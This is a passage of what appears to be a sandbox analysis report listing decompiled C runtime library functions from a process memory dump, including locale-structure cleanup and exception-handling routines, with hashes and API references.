Uniqueness

Uniqueness Score: -1.00%

Function 0145E717 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0145E750
___free_lconv_mon.LIBCMT ref: 0145E75B

Part of subcall function 0145D83B: _free.LIBCMT ref: 0145D858
Part of subcall function 0145D83B: _free.LIBCMT ref: 0145D86A
Part of subcall function 0145D83B: _free.LIBCMT ref: 0145D87C
Part of subcall function 0145D83B: _free.LIBCMT ref: 0145D88E
Part of subcall function 0145D83B: _free.LIBCMT ref: 0145D8A0
Part of subcall function 0145D83B: _free.LIBCMT ref: 0145D8B2
Part of subcall function 0145D83B: _free.LIBCMT ref: 0145D8C4
Part of subcall function 0145D83B: _free.LIBCMT ref: 0145D8D6
Part of subcall function 0145D83B: _free.LIBCMT ref: 0145D8E8
Part of subcall function 0145D83B: _free.LIBCMT ref: 0145D8FA
Part of subcall function 0145D83B: _free.LIBCMT ref: 0145D90C
Part of subcall function 0145D83B: _free.LIBCMT ref: 0145D91E
Part of subcall function 0145D83B: _free.LIBCMT ref: 0145D930

_free.LIBCMT ref: 0145E772
_free.LIBCMT ref: 0145E787
_free.LIBCMT ref: 0145E792
_free.LIBCMT ref: 0145E7B4
_free.LIBCMT ref: 0145E7C7
_free.LIBCMT ref: 0145E7D5
_free.LIBCMT ref: 0145E7E0
_free.LIBCMT ref: 0145E818
_free.LIBCMT ref: 0145E81F
_free.LIBCMT ref: 0145E83C
_free.LIBCMT ref: 0145E854

Memory Dump Source

Source File: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: _free$___free_lconv_mon
String ID:
API String ID: 3658870901-0
Opcode ID: ff1cb0ec868481b187b248d999acbfe25a008f8ee45d0e130e969acb70c7f830
Instruction ID: a728c914eb5f6f2d06e58987cee426acb46a59328b9427ac6916e8c75d33fbf3
Opcode Fuzzy Hash: ff1cb0ec868481b187b248d999acbfe25a008f8ee45d0e130e969acb70c7f830
Instruction Fuzzy Hash: 56316B716006069FFB71AA7ED844B6BB7E8EF54311F54452FE948E7272DB30AA84C610

Uniqueness

Uniqueness Score: -1.00%

Function 0138E96B Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0138E96B(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x13a3070) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E013871B2(_t46);
							E0138DC17( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E013871B2(_t47);
							E0138E0CB( *((intOrPtr*)(_t74 + 0x88)));
						}
						E013871B2( *((intOrPtr*)(_t74 + 0x7c)));
						E013871B2( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E013871B2( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E013871B2( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E013871B2( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E013871B2( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E0138EADC( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x13a3268) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E013871B2(_t31);
							E013871B2( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E013871B2(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E013871B2(_t74);
			}

0x0138e973
0x0138e977
0x0138e97f
0x0138e988
0x0138e98d
0x0138e994
0x0138e99c
0x0138e9a4
0x0138e9af
0x0138e9b5
0x0138e9b6
0x0138e9be
0x0138e9c6
0x0138e9d1
0x0138e9d7
0x0138e9db
0x0138e9e6
0x0138e9ec
0x0138e98d
0x0138e9ed
0x0138e9f5
0x0138ea08
0x0138ea1b
0x0138ea29
0x0138ea34
0x0138ea39
0x0138ea42
0x0138ea4a
0x0138ea4b
0x0138ea51
0x0138ea54
0x0138ea57
0x0138ea5e
0x0138ea60
0x0138ea64
0x0138ea6c
0x0138ea73
0x0138ea79
0x0138ea7a
0x0138ea7a
0x0138ea81
0x0138ea83
0x0138ea88
0x0138ea90
0x0138ea95
0x0138ea96
0x0138ea96
0x0138ea99
0x0138ea9c
0x0138ea9f
0x0138eaa2
0x0138eaa2
0x0138eab2

APIs

___free_lconv_mon.LIBCMT ref: 0138E9AF

Part of subcall function 0138DC17: _free.LIBCMT ref: 0138DC34
Part of subcall function 0138DC17: _free.LIBCMT ref: 0138DC46
Part of subcall function 0138DC17: _free.LIBCMT ref: 0138DC58
Part of subcall function 0138DC17: _free.LIBCMT ref: 0138DC6A
Part of subcall function 0138DC17: _free.LIBCMT ref: 0138DC7C
Part of subcall function 0138DC17: _free.LIBCMT ref: 0138DC8E
Part of subcall function 0138DC17: _free.LIBCMT ref: 0138DCA0
Part of subcall function 0138DC17: _free.LIBCMT ref: 0138DCB2
Part of subcall function 0138DC17: _free.LIBCMT ref: 0138DCC4
Part of subcall function 0138DC17: _free.LIBCMT ref: 0138DCD6
Part of subcall function 0138DC17: _free.LIBCMT ref: 0138DCE8
Part of subcall function 0138DC17: _free.LIBCMT ref: 0138DCFA
Part of subcall function 0138DC17: _free.LIBCMT ref: 0138DD0C

_free.LIBCMT ref: 0138E9A4

Part of subcall function 013871B2: HeapFree.KERNEL32(00000000,00000000,?,0138E36C,?,00000000,?,?,?,0138E60F,?,00000007,?,?,0138EB02,?), ref: 013871C8
Part of subcall function 013871B2: GetLastError.KERNEL32(?,?,0138E36C,?,00000000,?,?,?,0138E60F,?,00000007,?,?,0138EB02,?,?), ref: 013871DA

_free.LIBCMT ref: 0138E9C6
_free.LIBCMT ref: 0138E9DB
_free.LIBCMT ref: 0138E9E6
_free.LIBCMT ref: 0138EA08
_free.LIBCMT ref: 0138EA1B
_free.LIBCMT ref: 0138EA29
_free.LIBCMT ref: 0138EA34
_free.LIBCMT ref: 0138EA6C
_free.LIBCMT ref: 0138EA73
_free.LIBCMT ref: 0138EA90
_free.LIBCMT ref: 0138EAA8

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 8bfba13df1f99bd9ca257ca0c99dc72faad9fd34ced8213fbac94b1934a581a2
Instruction ID: 3bf6e90a8c4412d304c0870a4f9c251e261325aec1a1e669ba9ca4b28aa53eec
Opcode Fuzzy Hash: 8bfba13df1f99bd9ca257ca0c99dc72faad9fd34ced8213fbac94b1934a581a2
Instruction Fuzzy Hash: E8313B31600302AFEB71BB7CD844B5AB7EBBF00758F604429E595D7591DA78E884CB20

Uniqueness

Uniqueness Score: -1.00%

Function 0138DD15 Relevance: 18.4, APIs: 12, Instructions: 373
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0138DD15(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				signed int _t106;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t126;
				signed int _t130;
				signed int _t134;
				signed int _t138;
				signed int _t142;
				signed int _t146;
				signed int _t150;
				signed int _t154;
				signed int _t158;
				signed int _t162;
				signed int _t166;
				signed int _t170;
				signed int _t174;
				signed int _t178;
				signed int _t182;
				signed int _t186;
				signed int _t190;
				char _t196;
				char _t209;
				signed int _t212;
				char _t221;
				char _t222;
				void* _t225;
				char* _t227;
				signed int _t228;
				signed int _t232;
				signed int _t233;
				intOrPtr _t234;
				void* _t235;
				void* _t237;
				char* _t258;

				_t225 = __edx;
				_t209 = _a4;
				_v16 = 0;
				_v28 = _t209;
				_v24 = 0;
				if( *((intOrPtr*)(_t209 + 0xac)) != 0 ||  *((intOrPtr*)(_t209 + 0xb0)) != 0) {
					_t235 = E013858A2(1, 0x50);
					_v8 = _t235;
					E013871B2(0);
					if(_t235 != 0) {
						_t228 = E013858A2(1, 4);
						_v12 = _t228;
						E013871B2(0);
						if(_t228 != 0) {
							if( *((intOrPtr*)(_t209 + 0xac)) == 0) {
								_t212 = 0x14;
								memcpy(_v8, 0x13a3070, _t212 << 2);
								L24:
								_t237 = _v8;
								_t232 = _v16;
								 *_t237 =  *( *(_t209 + 0x88));
								 *((intOrPtr*)(_t237 + 4)) =  *((intOrPtr*)( *(_t209 + 0x88) + 4));
								 *((intOrPtr*)(_t237 + 8)) =  *((intOrPtr*)( *(_t209 + 0x88) + 8));
								 *((intOrPtr*)(_t237 + 0x30)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x30));
								 *((intOrPtr*)(_t237 + 0x34)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t232 != 0) {
									 *_t232 = 1;
								}
								goto L26;
							}
							_t233 = E013858A2(1, 4);
							_v16 = _t233;
							E013871B2(0);
							if(_t233 != 0) {
								_t234 =  *((intOrPtr*)(_t209 + 0xac));
								_t14 = _t235 + 0xc; // 0xc
								_t116 = E0138B24B(_t225);
								_t118 = E0138B24B(_t225,  &_v28, 1, _t234, 0x14, _v8 + 0x10,  &_v28);
								_t122 = E0138B24B(_t225,  &_v28, 1, _t234, 0x16, _v8 + 0x14, 1);
								_t126 = E0138B24B(_t225,  &_v28, 1, _t234, 0x17, _v8 + 0x18, _t234);
								_v20 = _v8 + 0x1c;
								_t130 = E0138B24B(_t225,  &_v28, 1, _t234, 0x18, _v8 + 0x1c, 0x15);
								_t134 = E0138B24B(_t225,  &_v28, 1, _t234, 0x50, _v8 + 0x20, _t14);
								_t138 = E0138B24B(_t225);
								_t142 = E0138B24B(_t225,  &_v28, 0, _t234, 0x1a, _v8 + 0x28,  &_v28);
								_t146 = E0138B24B(_t225,  &_v28, 0, _t234, 0x19, _v8 + 0x29, 1);
								_t150 = E0138B24B(_t225,  &_v28, 0, _t234, 0x54, _v8 + 0x2a, _t234);
								_t154 = E0138B24B(_t225,  &_v28, 0, _t234, 0x55, _v8 + 0x2b, 0x51);
								_t158 = E0138B24B(_t225,  &_v28, 0, _t234, 0x56, _v8 + 0x2c, _v8 + 0x24);
								_t162 = E0138B24B(_t225);
								_t166 = E0138B24B(_t225,  &_v28, 0, _t234, 0x52, _v8 + 0x2e,  &_v28);
								_t170 = E0138B24B(_t225,  &_v28, 0, _t234, 0x53, _v8 + 0x2f, 0);
								_t174 = E0138B24B(_t225,  &_v28, 2, _t234, 0x15, _v8 + 0x38, _t234);
								_t178 = E0138B24B(_t225,  &_v28, 2, _t234, 0x14, _v8 + 0x3c, 0x57);
								_t182 = E0138B24B(_t225,  &_v28, 2, _t234, 0x16, _v8 + 0x40, _v8 + 0x2d);
								_push(_v8 + 0x44);
								_push(0x17);
								_push(_t234);
								_t186 = E0138B24B(_t225);
								_t190 = E0138B24B(_t225,  &_v28, 2, _t234, 0x50, _v8 + 0x48,  &_v28);
								if((E0138B24B(_t225,  &_v28, 2, _t234, 0x51, _v8 + 0x4c, 2) | _t116 | _t118 | _t122 | _t126 | _t130 | _t134 | _t138 | _t142 | _t146 | _t150 | _t154 | _t158 | _t162 | _t166 | _t170 | _t174 | _t178 | _t182 | _t186 | _t190) == 0) {
									_t227 =  *_v20;
									while(1) {
										_t196 =  *_t227;
										if(_t196 == 0) {
											break;
										}
										_t61 = _t196 - 0x30; // -48
										_t221 = _t61;
										if(_t221 > 9) {
											if(_t196 != 0x3b) {
												L16:
												_t227 = _t227 + 1;
												continue;
											}
											_t258 = _t227;
											do {
												_t222 =  *((intOrPtr*)(_t258 + 1));
												 *_t258 = _t222;
												_t258 = _t258 + 1;
											} while (_t222 != 0);
											continue;
										}
										 *_t227 = _t221;
										goto L16;
									}
									goto L24;
								}
								E0138DC17(_v8);
								E013871B2(_v8);
								E013871B2(_v12);
								E013871B2(_v16);
								goto L4;
							}
							E013871B2(_t235);
							E013871B2(_v12);
							L7:
							goto L4;
						}
						E013871B2(_t235);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t232 = 0;
					_v12 = 0;
					_t237 = 0x13a3070;
					L26:
					_t106 =  *(_t209 + 0x84);
					if(_t106 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t209 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t106 | 0xffffffff) == 0) {
							E013871B2( *(_t209 + 0x88));
							E013871B2( *((intOrPtr*)(_t209 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t209 + 0x7c)) = _v12;
					 *(_t209 + 0x84) = _t232;
					 *(_t209 + 0x88) = _t237;
					return 0;
				}
			}

0x0138dd15
0x0138dd1e
0x0138dd25
0x0138dd28
0x0138dd2b
0x0138dd34
0x0138dd56
0x0138dd5a
0x0138dd5d
0x0138dd67
0x0138dd7a
0x0138dd7e
0x0138dd81
0x0138dd8b
0x0138dd9d
0x0138e02f
0x0138e030
0x0138e032
0x0138e03a
0x0138e03e
0x0138e043
0x0138e04e
0x0138e05a
0x0138e066
0x0138e072
0x0138e078
0x0138e07c
0x0138e07e
0x0138e07e
0x00000000
0x0138e07c
0x0138ddac
0x0138ddb0
0x0138ddb3
0x0138ddbd
0x0138ddd1
0x0138ddd7
0x0138dde4
0x0138ddfb
0x0138de12
0x0138de29
0x0138de39
0x0138de46
0x0138de5d
0x0138de74
0x0138de8b
0x0138dea5
0x0138debc
0x0138ded3
0x0138deea
0x0138df04
0x0138df1b
0x0138df32
0x0138df49
0x0138df63
0x0138df7a
0x0138df87
0x0138df88
0x0138df8a
0x0138df91
0x0138dfa8
0x0138dfcc
0x0138dffa
0x0138e009
0x0138e009
0x0138e00d
0x00000000
0x00000000
0x0138dffe
0x0138dffe
0x0138e004
0x0138e013
0x0138e008
0x0138e008
0x00000000
0x0138e008
0x0138e015
0x0138e017
0x0138e017
0x0138e01a
0x0138e01c
0x0138e01f
0x00000000
0x0138e023
0x0138e006
0x00000000
0x0138e006
0x00000000
0x0138e00f
0x0138dfd2
0x0138dfd8
0x0138dfe1
0x0138dfea
0x00000000
0x0138dfef
0x0138ddc0
0x0138ddc9
0x0138dd93
0x00000000
0x0138dd93
0x0138dd8e
0x00000000
0x0138dd8e
0x0138dd69
0x00000000
0x0138dd3e
0x0138dd3e
0x0138dd40
0x0138dd43
0x0138e080
0x0138e080
0x0138e088
0x0138e08a
0x0138e08a
0x0138e092
0x0138e097
0x0138e09b
0x0138e0a3
0x0138e0ab
0x0138e0b1
0x0138e09b
0x0138e0b5
0x0138e0ba
0x0138e0c0
0x00000000
0x0138e0c0

APIs

_free.LIBCMT ref: 0138DD5D
_free.LIBCMT ref: 0138DD81
_free.LIBCMT ref: 0138DD8E
_free.LIBCMT ref: 0138DDB3
_free.LIBCMT ref: 0138DDC0
_free.LIBCMT ref: 0138DDC9
_free.LIBCMT ref: 0138E0A3
_free.LIBCMT ref: 0138E0AB

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 30db9e4c8e4b2fd34dbf7c262e687389379dc2b29e8372a24715102b5308c486
Instruction ID: ee40b9e4ef25ae3801076b05bdc0d1c908db7a5b19d8ef0f3e95089144db81e1
Opcode Fuzzy Hash: 30db9e4c8e4b2fd34dbf7c262e687389379dc2b29e8372a24715102b5308c486
Instruction Fuzzy Hash: DEC154B2E40305ABDB20EBACCC45FEEB7F9AF18704F144565FA05FB285D6709A458B60

Uniqueness

Uniqueness Score: -1.00%

Function 01385C59 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E01385C59(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x13970c0;
				if(_t68 != 0x13970c0) {
					E013871B2(_t68);
					_t36 = _a4;
				}
				E013871B2( *((intOrPtr*)(_t36 + 0x3c)));
				E013871B2( *((intOrPtr*)(_a4 + 0x30)));
				E013871B2( *((intOrPtr*)(_a4 + 0x34)));
				E013871B2( *((intOrPtr*)(_a4 + 0x38)));
				E013871B2( *((intOrPtr*)(_a4 + 0x28)));
				E013871B2( *((intOrPtr*)(_a4 + 0x2c)));
				E013871B2( *((intOrPtr*)(_a4 + 0x40)));
				E013871B2( *((intOrPtr*)(_a4 + 0x44)));
				E013871B2( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E01385A85(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E01385AF0(_t67, _t72, _t73, _t77);
			}

0x01385c59
0x01385c59
0x01385c59
0x01385c5e
0x01385c64
0x01385c66
0x01385c6c
0x01385c6f
0x01385c74
0x01385c77
0x01385c7b
0x01385c86
0x01385c91
0x01385c9c
0x01385ca7
0x01385cb2
0x01385cbd
0x01385cc8
0x01385cd6
0x01385ce1
0x01385ce9
0x01385cea
0x01385ced
0x01385cf3
0x01385cf7
0x01385cfb
0x01385cfc
0x01385d06
0x01385d0c
0x01385d0d
0x01385d10
0x01385d16
0x01385d1a
0x01385d1e
0x01385d25

APIs

_free.LIBCMT ref: 01385C6F

Part of subcall function 013871B2: HeapFree.KERNEL32(00000000,00000000,?,0138E36C,?,00000000,?,?,?,0138E60F,?,00000007,?,?,0138EB02,?), ref: 013871C8
Part of subcall function 013871B2: GetLastError.KERNEL32(?,?,0138E36C,?,00000000,?,?,?,0138E60F,?,00000007,?,?,0138EB02,?,?), ref: 013871DA

_free.LIBCMT ref: 01385C7B
_free.LIBCMT ref: 01385C86
_free.LIBCMT ref: 01385C91
_free.LIBCMT ref: 01385C9C
_free.LIBCMT ref: 01385CA7
_free.LIBCMT ref: 01385CB2
_free.LIBCMT ref: 01385CBD
_free.LIBCMT ref: 01385CC8
_free.LIBCMT ref: 01385CD6

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2bebe0433c23614f3804760769825183916729140ff28d0d2ed4f347a4591aa2
Instruction ID: 2617e7f9c4ea9a2c931cc4f6e1b01647bd7603e0dc4159a2ae69d9ff8cc13ef5
Opcode Fuzzy Hash: 2bebe0433c23614f3804760769825183916729140ff28d0d2ed4f347a4591aa2
Instruction Fuzzy Hash: E521AB76900209BFCB41EF98CC84DDE7BBABF18244F504165F6159B620DB31DA98CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0137B5A8 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E0137B5A8(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t201;
				signed int _t202;
				char _t203;
				signed int _t205;
				signed int _t207;
				signed char* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t214;
				void* _t217;
				signed char* _t220;
				void* _t222;
				void* _t224;
				signed char _t228;
				signed int _t229;
				void* _t231;
				void* _t234;
				void* _t237;
				signed int _t247;
				void* _t250;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr _t253;
				signed int _t254;
				void* _t259;
				void* _t264;
				void* _t265;
				signed int _t269;
				signed char* _t270;
				intOrPtr* _t271;
				signed char _t272;
				signed int _t273;
				signed int _t274;
				intOrPtr* _t276;
				signed int _t277;
				signed int _t278;
				signed int _t283;
				signed int _t290;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed char* _t297;
				signed int _t298;
				signed char _t299;
				signed int* _t301;
				signed char* _t304;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				signed int _t327;
				void* _t329;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;

				_t296 = __edx;
				_push(_t315);
				_t301 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t275 = E0137C520(_a8, _a16, _t301);
				_t332 = _t331 + 0xc;
				_v12 = _t275;
				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
					L67:
					_t201 = E013824F9(_t270, _t275, _t296, _t301, _t315);
					asm("int3");
					_t329 = _t332;
					_t333 = _t332 - 0x38;
					_push(_t270);
					_t271 = _v112;
					__eflags =  *_t271 - 0x80000003;
					if( *_t271 == 0x80000003) {
						return _t201;
					} else {
						_t202 = E0137B22C(_t271, _t275, _t296, _t301, _t315, _t301, _t315);
						__eflags =  *(_t202 + 8);
						if( *(_t202 + 8) != 0) {
							__imp__EncodePointer(0);
							_t315 = _t202;
							_t222 = E0137B22C(_t271, _t275, _t296, 0, _t315);
							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
								__eflags =  *_t271 - 0xe0434f4d;
								if( *_t271 != 0xe0434f4d) {
									__eflags =  *_t271 - 0xe0434352;
									if( *_t271 != 0xe0434352) {
										_t214 = E013794C6(_t296, 0, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
										_t333 = _t333 + 0x1c;
										__eflags = _t214;
										if(_t214 != 0) {
											L84:
											return _t214;
										}
									}
								}
							}
						}
						_t203 = _a16;
						_v28 = _t203;
						_v24 = 0;
						__eflags =  *(_t203 + 0xc);
						if( *(_t203 + 0xc) > 0) {
							_push(_a24);
							E013793F9(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
							_t298 = _v40;
							_t334 = _t333 + 0x18;
							_t214 = _v44;
							_v20 = _t214;
							_v12 = _t298;
							__eflags = _t298 - _v32;
							if(_t298 >= _v32) {
								goto L84;
							}
							_t277 = _t298 * 0x14;
							__eflags = _t277;
							_v16 = _t277;
							do {
								_t278 = 5;
								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
								_t334 = _t334 + 0xc;
								__eflags = _v64 - _t217;
								if(_v64 > _t217) {
									goto L83;
								}
								__eflags = _t217 - _v60;
								if(_t217 > _v60) {
									goto L83;
								}
								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t283 = _t220[4];
								__eflags = _t283;
								if(_t283 == 0) {
									L81:
									__eflags =  *_t220 & 0x00000040;
									if(( *_t220 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E0137B528(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
										_t298 = _v12;
										_t334 = _t334 + 0x30;
									}
									goto L83;
								}
								__eflags =  *((char*)(_t283 + 8));
								if( *((char*)(_t283 + 8)) != 0) {
									goto L83;
								}
								goto L81;
								L83:
								_t298 = _t298 + 1;
								_t214 = _v20;
								_t277 = _v16 + 0x14;
								_v12 = _t298;
								_v16 = _t277;
								__eflags = _t298 - _v32;
							} while (_t298 < _v32);
							goto L84;
						}
						E013824F9(_t271, _t275, _t296, 0, _t315);
						asm("int3");
						_push(_t329);
						_t297 = _v184;
						_push(_t271);
						_push(_t315);
						_push(0);
						_t205 = _t297[4];
						__eflags = _t205;
						if(_t205 == 0) {
							L109:
							_t207 = 1;
							__eflags = 1;
						} else {
							_t276 = _t205 + 8;
							__eflags =  *_t276;
							if( *_t276 == 0) {
								goto L109;
							} else {
								__eflags =  *_t297 & 0x00000080;
								_t304 = _v0;
								if(( *_t297 & 0x00000080) == 0) {
									L91:
									_t272 = _t304[4];
									_t317 = 0;
									__eflags = _t205 - _t272;
									if(_t205 == _t272) {
										L101:
										__eflags =  *_t304 & 0x00000002;
										if(( *_t304 & 0x00000002) == 0) {
											L103:
											_t208 = _a4;
											__eflags =  *_t208 & 0x00000001;
											if(( *_t208 & 0x00000001) == 0) {
												L105:
												__eflags =  *_t208 & 0x00000002;
												if(( *_t208 & 0x00000002) == 0) {
													L107:
													_t317 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t297 & 0x00000002;
													if(( *_t297 & 0x00000002) != 0) {
														goto L107;
													}
												}
											} else {
												__eflags =  *_t297 & 0x00000001;
												if(( *_t297 & 0x00000001) != 0) {
													goto L105;
												}
											}
										} else {
											__eflags =  *_t297 & 0x00000008;
											if(( *_t297 & 0x00000008) != 0) {
												goto L103;
											}
										}
										_t207 = _t317;
									} else {
										_t184 = _t272 + 8; // 0x6e
										_t209 = _t184;
										while(1) {
											_t273 =  *_t276;
											__eflags = _t273 -  *_t209;
											if(_t273 !=  *_t209) {
												break;
											}
											__eflags = _t273;
											if(_t273 == 0) {
												L97:
												_t210 = _t317;
											} else {
												_t274 =  *((intOrPtr*)(_t276 + 1));
												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
													break;
												} else {
													_t276 = _t276 + 2;
